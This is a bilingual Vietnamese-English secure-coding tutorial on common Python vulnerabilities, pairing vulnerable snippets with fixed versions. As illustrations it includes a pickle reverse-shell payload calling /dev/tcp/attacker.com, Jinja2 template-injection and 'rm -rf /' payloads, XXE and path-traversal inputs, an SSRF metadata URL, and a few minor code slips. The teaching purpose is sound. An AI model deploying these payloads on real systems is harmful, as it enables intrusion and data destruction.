Skip to content

Common Vulnerabilities Security

Hiểu các lỗ hổng phổ biến để không bao giờ mắc phải chúng

Learning Outcomes

Sau khi hoàn thành trang này, bạn sẽ:

  • 🎯 Hiểu OWASP Top 10 và cách áp dụng cho Python
  • 🎯 Nhận biết nguy hiểm của pickle và deserialization
  • 🎯 Tránh eval() và code injection risks
  • 🎯 Phòng chống Path Traversal attacks
  • 🎯 Identify và fix các Production Pitfalls bảo mật

OWASP Top 10 cho Python

OWASP Top 10 là danh sách 10 lỗ hổng bảo mật web phổ biến nhất. Đây là cách chúng áp dụng cho Python.

┌─────────────────────────────────────────────────────────────┐
│  A01: Broken Access Control                                 │
│  A02: Cryptographic Failures                                │
│  A03: Injection                                             │
│  A04: Insecure Design                                       │
│  A05: Security Misconfiguration                             │
│  A06: Vulnerable Components                                 │
│  A07: Identification & Authentication Failures              │
│  A08: Software & Data Integrity Failures                    │
│  A09: Security Logging & Monitoring Failures                │
│  A10: Server-Side Request Forgery (SSRF)                    │
└─────────────────────────────────────────────────────────────┘

A01: Broken Access Control

python
from fastapi import FastAPI, Depends, HTTPException
from typing import Optional

app = FastAPI()

# ❌ VULNERABLE: No authorization check
@app.get("/users/{user_id}/profile")
async def get_profile_bad(user_id: int):
    return get_user_profile(user_id)  # Anyone can access any profile!

# ❌ VULNERABLE: Insecure Direct Object Reference (IDOR)
@app.delete("/documents/{doc_id}")
async def delete_document_bad(doc_id: int):
    delete_document(doc_id)  # No ownership check!
    return {"deleted": doc_id}
python
# ✅ SECURE: Proper authorization
from fastapi import Depends
from models import User, Document

async def get_current_user(token: str = Depends(oauth2_scheme)) -> User:
    """Verify token and return current user."""
    user = verify_token(token)
    if not user:
        raise HTTPException(status_code=401, detail="Invalid token")
    return user

@app.get("/users/{user_id}/profile")
async def get_profile_good(
    user_id: int,
    current_user: User = Depends(get_current_user)
):
    # Check if user can access this profile
    if current_user.id != user_id and not current_user.is_admin:
        raise HTTPException(status_code=403, detail="Access denied")
    return get_user_profile(user_id)

@app.delete("/documents/{doc_id}")
async def delete_document_good(
    doc_id: int,
    current_user: User = Depends(get_current_user)
):
    document = get_document(doc_id)
    if not document:
        raise HTTPException(status_code=404, detail="Document not found")
    
    # Verify ownership
    if document.owner_id != current_user.id and not current_user.is_admin:
        raise HTTPException(status_code=403, detail="Not your document")
    
    delete_document(doc_id)
    return {"deleted": doc_id}

A03: Injection

python
# SQL Injection - covered in validation.md
# Command Injection - covered in validation.md

# Template Injection
from jinja2 import Environment, BaseLoader, select_autoescape

# ❌ VULNERABLE: User input in template
def render_bad(user_input: str) -> str:
    template = Environment(loader=BaseLoader()).from_string(user_input)
    return template.render()
    # Attack: {{ config.__class__.__init__.__globals__['os'].popen('id').read() }}

# ✅ SECURE: Autoescape and sandboxed environment
from jinja2.sandbox import SandboxedEnvironment

def render_good(template_str: str, context: dict) -> str:
    env = SandboxedEnvironment(
        loader=BaseLoader(),
        autoescape=select_autoescape(['html', 'xml'])
    )
    template = env.from_string(template_str)
    return template.render(**context)

A05: Security Misconfiguration

python
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware

app = FastAPI()

# ❌ VULNERABLE: Overly permissive CORS
app.add_middleware(
    CORSMiddleware,
    allow_origins=["*"],  # Allows ANY origin!
    allow_credentials=True,  # With credentials = very dangerous
    allow_methods=["*"],
    allow_headers=["*"],
)

# ✅ SECURE: Specific origins
ALLOWED_ORIGINS = [
    "https://myapp.com",
    "https://admin.myapp.com",
]

if os.environ.get("DEBUG"):
    ALLOWED_ORIGINS.append("http://localhost:3000")

app.add_middleware(
    CORSMiddleware,
    allow_origins=ALLOWED_ORIGINS,
    allow_credentials=True,
    allow_methods=["GET", "POST", "PUT", "DELETE"],
    allow_headers=["Authorization", "Content-Type"],
)
)
python
# ❌ VULNERABLE: Debug mode in production
from flask import Flask
app = Flask(__name__)
app.run(debug=True)  # Exposes debugger, allows code execution!

# ✅ SECURE: Environment-based configuration
import os
DEBUG = os.environ.get("FLASK_DEBUG", "false").lower() == "true"
app.run(debug=DEBUG)  # Only True in development

A06: Vulnerable Components

python
# Check for known vulnerabilities in dependencies

# Using pip-audit
# $ pip-audit
# Found 2 known vulnerabilities in 1 package

# Using safety
# $ safety check
# +==============================================================================+
# | REPORT                                                                       |
# +==============================================================================+
# | package: requests                                                            |
# | installed: 2.25.0                                                            |
# | affected: <2.31.0                                                            |
# | id: 58755                                                                    |
# +==============================================================================+

# Automated in CI/CD
# .github/workflows/security.yml
"""
name: Security Scan
on: [push, pull_request]
jobs:
  security:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-python@v5
        with:
          python-version: '3.12'
      - run: pip install pip-audit
      - run: pip-audit --require-hashes --strict
"""

A10: Server-Side Request Forgery (SSRF)

python
import requests
from urllib.parse import urlparse

# ❌ VULNERABLE: Fetch any URL user provides
@app.post("/fetch-url")
async def fetch_url_bad(url: str):
    response = requests.get(url)  # Can access internal services!
    return {"content": response.text}
    # Attack: url = "http://169.254.169.254/latest/meta-data/"
    # Accesses AWS metadata service!

# ✅ SECURE: Validate and restrict URLs
import ipaddress
import socket

ALLOWED_SCHEMES = {"http", "https"}
BLOCKED_HOSTS = {"localhost", "127.0.0.1", "0.0.0.0", "169.254.169.254"}
BLOCKED_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),      # Private
    ipaddress.ip_network("172.16.0.0/12"),   # Private
    ipaddress.ip_network("192.168.0.0/16"),  # Private
    ipaddress.ip_network("169.254.0.0/16"),  # Link-local (AWS metadata)
]

def is_safe_url(url: str) -> bool:
    """Check if URL is safe to fetch."""
    try:
        parsed = urlparse(url)
        
        # Check scheme
        if parsed.scheme not in ALLOWED_SCHEMES:
            return False
        
        # Check hostname
        hostname = parsed.hostname
        if not hostname or hostname in BLOCKED_HOSTS:
            return False
        
        # Resolve hostname and check IP
        try:
            ip = ipaddress.ip_address(socket.gethostbyname(hostname))
            for network in BLOCKED_NETWORKS:
                if ip in network:
                    return False
        except (socket.gaierror, ValueError):
            return False
        
        return True
    except Exception:
        return False

@app.post("/fetch-url")
async def fetch_url_good(url: str):
    if not is_safe_url(url):
        raise HTTPException(status_code=400, detail="URL not allowed")
    
    response = requests.get(url, timeout=10)
    return {"content": response.text[:10000]}  # Limit response size

Pickle Dangers

pickle là một trong những lỗ hổng nguy hiểm nhất trong Python. KHÔNG BAO GIỜ unpickle data từ nguồn không tin cậy.

The Problem

python
import pickle

# Pickle có thể execute arbitrary code khi unpickle
class Exploit:
    def __reduce__(self):
        import os
        return (os.system, ("rm -rf /",))  # Executes on unpickle!

# ❌ VULNERABLE: Unpickle user data
@app.post("/load-data")
async def load_data_bad(data: bytes):
    obj = pickle.loads(data)  # ARBITRARY CODE EXECUTION!
    return {"loaded": str(obj)}

# Attack: Attacker sends pickled Exploit object
# Server executes: os.system("rm -rf /")

Real Attack Example

python
import pickle
import base64

# Attacker creates malicious pickle
class ReverseShell:
    def __reduce__(self):
        import subprocess
        return (
            subprocess.Popen,
            (["bash", "-c", "bash -i >& /dev/tcp/attacker.com/4444 0>&1"],)
        )

# Serialize and encode
payload = base64.b64encode(pickle.dumps(ReverseShell()))
print(payload)  # Send this to vulnerable endpoint

# When server unpickles: reverse shell to attacker!

Safe Alternatives

python
import json
from typing import Any

# ✅ SAFE: Use JSON for untrusted data
@app.post("/load-data")
async def load_data_good(data: str):
    try:
        obj = json.loads(data)  # Only parses data, no code execution
        return {"loaded": obj}
    except json.JSONDecodeError:
        raise HTTPException(status_code=400, detail="Invalid JSON")

# ✅ SAFE: Use Pydantic for structured data
from pydantic import BaseModel

class UserData(BaseModel):
    name: str
    age: int
    tags: list[str]

@app.post("/load-user")
async def load_user(data: UserData):
    return {"user": data.model_dump()}

If You Must Use Pickle

python
import pickle
import hmac
import hashlib

SECRET_KEY = b"your-secret-key-here"

def secure_pickle_dumps(obj: Any) -> bytes:
    """Pickle with HMAC signature."""
    data = pickle.dumps(obj)
    signature = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    return signature + data

def secure_pickle_loads(signed_data: bytes) -> Any:
    """Unpickle with signature verification."""
    if len(signed_data) < 32:
        raise ValueError("Invalid data")
    
    signature = signed_data[:32]
    data = signed_data[32:]
    
    expected_sig = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    if not hmac.compare_digest(signature, expected_sig):
        raise ValueError("Invalid signature - data may be tampered")
    
    return pickle.loads(data)

# ⚠️ WARNING: This only prevents tampering, not malicious internal data!
# Only use for data YOU created, never for user input

Pickle Alternatives Comparison

FormatSafe for Untrusted?Preserves Types?Human Readable?
pickle❌ NO✅ Yes❌ No
JSON✅ Yes❌ Basic only✅ Yes
MessagePack✅ Yes❌ Basic only❌ No
Protocol Buffers✅ Yes✅ Schema-defined❌ No
YAML⚠️ Careful❌ Basic only✅ Yes

eval() and exec() Risks

eval()exec() execute arbitrary Python code. KHÔNG BAO GIỜ dùng với user input.

The Problem

python
# ❌ VULNERABLE: eval() with user input
@app.get("/calculate")
async def calculate_bad(expression: str):
    result = eval(expression)  # ARBITRARY CODE EXECUTION!
    return {"result": result}

# Attack: expression = "__import__('os').system('rm -rf /')"
# Server executes: os.system('rm -rf /')

# ❌ VULNERABLE: exec() with user input
@app.post("/run-code")
async def run_code_bad(code: str):
    exec(code)  # ARBITRARY CODE EXECUTION!
    return {"status": "executed"}

Safe Alternatives

python
# ✅ SAFE: Use ast.literal_eval for simple expressions
import ast

def safe_eval(expression: str) -> Any:
    """Safely evaluate literal expressions only."""
    try:
        return ast.literal_eval(expression)
    except (ValueError, SyntaxError):
        raise ValueError("Invalid expression")

# Only allows: strings, bytes, numbers, tuples, lists, dicts, sets, booleans, None
safe_eval("[1, 2, 3]")  # OK: [1, 2, 3]
safe_eval("{'a': 1}")   # OK: {'a': 1}
# safe_eval("__import__('os')")  # ValueError!

# ✅ SAFE: Use a math expression parser
# pip install simpleeval
from simpleeval import simple_eval

@app.get("/calculate")
async def calculate_good(expression: str):
    try:
        # Only allows math operations
        result = simple_eval(expression)
        return {"result": result}
    except Exception:
        raise HTTPException(status_code=400, detail="Invalid expression")

# simple_eval("2 + 2")  # OK: 4
# simple_eval("10 * (5 + 3)")  # OK: 80
# simple_eval("__import__('os')")  # NameNotDefined error

If You Must Execute Dynamic Code

python
# ✅ SAFER: Restricted execution environment
import ast
from typing import Any

ALLOWED_NAMES = {
    'abs': abs,
    'min': min,
    'max': max,
    'sum': sum,
    'len': len,
    'round': round,
    'True': True,
    'False': False,
    'None': None,
}

ALLOWED_NODES = {
    ast.Expression,
    ast.BinOp,
    ast.UnaryOp,
    ast.Compare,
    ast.Num,  # Python < 3.8
    ast.Constant,  # Python >= 3.8
    ast.Name,
    ast.Load,
    ast.Add, ast.Sub, ast.Mult, ast.Div,
    ast.Eq, ast.NotEq, ast.Lt, ast.LtE, ast.Gt, ast.GtE,
}

def restricted_eval(expression: str, variables: dict = None) -> Any:
    """
    Evaluate expression with restricted operations.
    
    Args:
        expression: Math/logic expression
        variables: Additional allowed variables
    
    Returns:
        Evaluation result
    """
    # Parse to AST
    try:
        tree = ast.parse(expression, mode='eval')
    except SyntaxError:
        raise ValueError("Invalid syntax")
    
    # Validate all nodes are allowed
    for node in ast.walk(tree):
        if type(node) not in ALLOWED_NODES:
            raise ValueError(f"Operation not allowed: {type(node).__name__}")
    
    # Build namespace
    namespace = ALLOWED_NAMES.copy()
    if variables:
        namespace.update(variables)
    
    # Evaluate
    code = compile(tree, '<string>', 'eval')
    return eval(code, {"__builtins__": {}}, namespace)

# Usage
result = restricted_eval("x + y * 2", {"x": 10, "y": 5})  # 20
# restricted_eval("__import__('os')")  # ValueError!

Path Traversal

Path traversal cho phép attacker truy cập files ngoài thư mục cho phép.

The Problem

python
from pathlib import Path

# ❌ VULNERABLE: Direct path concatenation
@app.get("/files/{filename}")
async def get_file_bad(filename: str):
    filepath = f"/var/www/uploads/{filename}"
    return FileResponse(filepath)

# Attack: filename = "../../../etc/passwd"
# Accesses: /var/www/uploads/../../../etc/passwd = /etc/passwd

# ❌ VULNERABLE: Even with Path
@app.get("/files/{filename}")
async def get_file_still_bad(filename: str):
    base = Path("/var/www/uploads")
    filepath = base / filename  # Still vulnerable!
    return FileResponse(filepath)

Safe File Access

python
from pathlib import Path
from fastapi import HTTPException
from fastapi.responses import FileResponse

BASE_DIR = Path("/var/www/uploads").resolve()

def safe_path(base: Path, user_path: str) -> Path:
    """
    Safely resolve user-provided path within base directory.
    
    Args:
        base: Base directory (must be absolute)
        user_path: User-provided path component
    
    Returns:
        Safe resolved path
    
    Raises:
        ValueError: If path escapes base directory
    """
    # Resolve to absolute path
    try:
        full_path = (base / user_path).resolve()
    except (OSError, ValueError):
        raise ValueError("Invalid path")
    
    # Ensure path is within base directory
    try:
        full_path.relative_to(base)
    except ValueError:
        raise ValueError("Path traversal detected")
    
    return full_path

@app.get("/files/{filename:path}")
async def get_file_good(filename: str):
    try:
        filepath = safe_path(BASE_DIR, filename)
    except ValueError as e:
        raise HTTPException(status_code=400, detail=str(e))
    
    if not filepath.exists():
        raise HTTPException(status_code=404, detail="File not found")
    
    if not filepath.is_file():
        raise HTTPException(status_code=400, detail="Not a file")
    
    return FileResponse(filepath)

Additional Path Security

python
from pathlib import Path
import os
import stat

def secure_file_access(
    base_dir: Path,
    user_path: str,
    allowed_extensions: set[str] = None,
    max_size: int = None
) -> Path:
    """
    Comprehensive secure file access.
    
    Args:
        base_dir: Base directory
        user_path: User-provided path
        allowed_extensions: Set of allowed extensions (e.g., {'.txt', '.pdf'})
        max_size: Maximum file size in bytes
    
    Returns:
        Safe file path
    
    Raises:
        ValueError: If any security check fails
    """
    # 1. Resolve path safely
    base = base_dir.resolve()
    try:
        filepath = (base / user_path).resolve()
    except (OSError, ValueError):
        raise ValueError("Invalid path")
    
    # 2. Check path is within base
    try:
        filepath.relative_to(base)
    except ValueError:
        raise ValueError("Path traversal detected")
    
    # 3. Check file exists and is regular file
    if not filepath.exists():
        raise ValueError("File not found")
    
    if not filepath.is_file():
        raise ValueError("Not a regular file")
    
    # 4. Check not a symlink (could point outside base)
    if filepath.is_symlink():
        # Resolve symlink and check again
        real_path = filepath.resolve()
        try:
            real_path.relative_to(base)
        except ValueError:
            raise ValueError("Symlink points outside allowed directory")
    
    # 5. Check extension
    if allowed_extensions:
        if filepath.suffix.lower() not in allowed_extensions:
            raise ValueError(f"Extension not allowed: {filepath.suffix}")
    
    # 6. Check file size
    if max_size:
        file_size = filepath.stat().st_size
        if file_size > max_size:
            raise ValueError(f"File too large: {file_size} bytes")
    
    # 7. Check file permissions (optional - ensure readable)
    if not os.access(filepath, os.R_OK):
        raise ValueError("File not readable")
    
    return filepath

# Usage
filepath = secure_file_access(
    base_dir=Path("/var/www/uploads"),
    user_path="documents/report.pdf",
    allowed_extensions={".pdf", ".txt", ".docx"},
    max_size=10 * 1024 * 1024  # 10MB
)

Other Common Vulnerabilities

XML External Entity (XXE)

python
import xml.etree.ElementTree as ET

# ❌ VULNERABLE: Default XML parser allows external entities
def parse_xml_bad(xml_string: str):
    return ET.fromstring(xml_string)

# Attack payload:
"""
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
"""

# ✅ SAFE: Use defusedxml
from defusedxml import ElementTree as SafeET

def parse_xml_good(xml_string: str):
    return SafeET.fromstring(xml_string)
    # Raises EntitiesForbidden if external entities detected

YAML Deserialization

python
import yaml

# ❌ VULNERABLE: yaml.load() can execute code
def load_yaml_bad(yaml_string: str):
    return yaml.load(yaml_string)  # Unsafe!

# Attack payload:
"""
!!python/object/apply:os.system
args: ['rm -rf /']
"""

# ✅ SAFE: Use safe_load
def load_yaml_good(yaml_string: str):
    return yaml.safe_load(yaml_string)
    # Only loads basic Python types

Regular Expression Denial of Service (ReDoS)

python
import re

# ❌ VULNERABLE: Catastrophic backtracking
evil_patterns = [
    r'^(a+)+$',           # Nested quantifiers
    r'^([a-zA-Z]+)*$',    # Nested quantifiers
    r'^(a|a)+$',          # Overlapping alternatives
]

# Attack: 'a' * 30 + 'b' causes exponential time

# ✅ SAFE: Use atomic groups or possessive quantifiers
# Or use google-re2 library
import re2  # pip install google-re2

def safe_regex_match(pattern: str, text: str) -> bool:
    """Match regex with guaranteed linear time."""
    try:
        return bool(re2.match(pattern, text))
    except re2.error:
        return False

Insecure Randomness

python
import random

# ❌ VULNERABLE: random module is predictable
def generate_token_bad():
    return ''.join(random.choices('abcdef0123456789', k=32))
    # Attacker can predict future tokens if they know seed

# ✅ SAFE: Use secrets module
import secrets

def generate_token_good():
    return secrets.token_hex(16)  # Cryptographically secure

Production Pitfalls

Pitfall 1: Trusting Client-Side Validation

python
# ❌ BUG: Only validating on frontend
# Frontend: if (age < 0) showError("Invalid age")
# Backend assumes frontend validated

@app.post("/users")
async def create_user_bad(data: dict):
    user = User(**data)  # No validation!
    db.add(user)
    return user

# ✅ FIX: Always validate on backend
from pydantic import BaseModel, Field

class UserCreate(BaseModel):
    name: str = Field(..., min_length=1, max_length=100)
    age: int = Field(..., ge=0, le=150)
    email: EmailStr

@app.post("/users")
async def create_user_good(data: UserCreate):
    user = User(**data.model_dump())
    db.add(user)
    return user

Pitfall 2: Information Disclosure in Errors

python
# ❌ BUG: Exposing internal details
@app.get("/users/{user_id}")
async def get_user_bad(user_id: int):
    try:
        return db.query(User).filter(User.id == user_id).one()
    except Exception as e:
        raise HTTPException(status_code=500, detail=str(e))
        # Exposes: "sqlalchemy.exc.NoResultFound: No row was found..."

# ✅ FIX: Generic error messages
import logging
logger = logging.getLogger(__name__)

@app.get("/users/{user_id}")
async def get_user_good(user_id: int):
    try:
        user = db.query(User).filter(User.id == user_id).first()
        if not user:
            raise HTTPException(status_code=404, detail="User not found")
        return user
    except HTTPException:
        raise
    except Exception as e:
        logger.exception(f"Error fetching user {user_id}")  # Log details
        raise HTTPException(status_code=500, detail="Internal server error")

Pitfall 3: Mass Assignment

python
# ❌ BUG: Accepting all fields
@app.put("/users/{user_id}")
async def update_user_bad(user_id: int, data: dict):
    user = get_user(user_id)
    for key, value in data.items():
        setattr(user, key, value)  # Can set is_admin=True!
    db.commit()

# ✅ FIX: Explicit allowed fields
class UserUpdate(BaseModel):
    name: Optional[str] = None
    email: Optional[EmailStr] = None
    # is_admin NOT included

@app.put("/users/{user_id}")
async def update_user_good(user_id: int, data: UserUpdate):
    user = get_user(user_id)
    update_data = data.model_dump(exclude_unset=True)
    for key, value in update_data.items():
        setattr(user, key, value)
    db.commit()

Pitfall 4: Timing Attacks

python
# ❌ BUG: Early return reveals information
def verify_password_bad(provided: str, stored_str: str) -> bool:
    if len(provided) != len(stored):
        return False  # Reveals password length!
    
    for a, b in zip(provided, stored):
        if a != b:
            return False  # Early exit reveals position
    return True

# ✅ FIX: Constant-time comparison
import hmac

def verify_password_good(provided: str, stored: str) -> bool:
    return hmac.compare_digest(provided.encode(), stored.encode())

Quick Reference

python
# === NEVER DO ===
pickle.loads(untrusted_data)      # Arbitrary code execution
eval(user_input)                   # Arbitrary code execution
exec(user_input)                   # Arbitrary code execution
yaml.load(untrusted_yaml)          # Use yaml.safe_load()
os.system(f"cmd {user_input}")     # Command injection

# === ALWAYS DO ===
# Parameterized queries
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))

# Safe path handling
safe_path = (base_dir / user_path).resolve()
safe_path.relative_to(base_dir)  # Raises if outside

# Constant-time comparison
secrets.compare_digest(a, b)

# Safe XML parsing
from defusedxml import ElementTree
ElementTree.fromstring(xml_data)

# Safe YAML parsing
yaml.safe_load(yaml_data)